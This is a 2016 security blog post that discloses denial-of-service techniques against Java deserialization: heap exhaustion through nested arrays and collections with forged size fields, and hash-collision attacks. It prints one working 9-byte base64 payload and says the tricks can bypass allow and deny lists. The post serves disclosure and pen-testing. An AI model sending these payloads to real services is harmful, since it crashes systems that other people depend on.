Friday, April 1, 2016

Java Deserialization DoS - payloads

Handy payloads for testing Java Deserialization vulnerability

GitHub project:

Update: A new attack vector against ObjectInputStream.readProxyDesc() using just 9 bytes: rO0ABX1////3


  • Generic heap overflow
  • Heap overflow using nested Object[] arrays 
  • Heap overflow using nested ArrayList
  • Heap overflow using nested HashMap
  • HashMap and Hashtable collisions attacks

Can be used to bypass blacklist protections or whitelists allowing Object[] array, ArrayList or HashMap.

Payloads to consume 8GB of heap:

Generic (9 bytes): 


Nested Object[] (44 bytes): 


Nested ArrayList (67 bytes):


Nested HashMap (110 bytes):



114 bytes to consume 64GB of heap (nested Object[]):


Short description of Heap overflow attacks

In order to minimize the size of payload I play with "size" field of the classes to overwrite serialized data so that the "size" is near Integer.MAX_VALUE, even though there are only few entries inside the payload.

During deserialization the classes pre-allocate big arrays (based on "size") to be filled with values before actual reading the values happen. Therefore it's not necessary to send all values, OutOfMemoryError is thrown after few allocations for nested objects ... Object[] can contain another Object[].

Let's look at the Object[] payload. It was modified to have max possible size for arrays: ArrayList.MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8 This means array of 2 billion of pointers (each 4 bytes) => 2^9 * 4B = 8GB

Having 8 such Object[] arrays nested one inside another, JVM allocates 8GB array for the root array object, then reads first item ... nested Object[] which is again max-sized array. So allocates another 8GB and continues to deserialize 2nd level array with another 8GB, etc. etc., sooner or later fails with OutOfMemoryError.

Short description of HashMap and Hashtable collision attacks

HashMap in Java 1.7, when created with initialCapacity == loadFactor, create one and only one bucket to store all items. 

Hashtable during deserialization suffers similar condition and allows negative loadFactor => using just one bucket to store all items.

Other info

Please use only for your pen-testing / evaluation of your products.

Reported to Oracle in 2015 with "won't fix" response. Hashtable negative loadFactor bug is treated as a functional bug and should be fixed in one of future releases.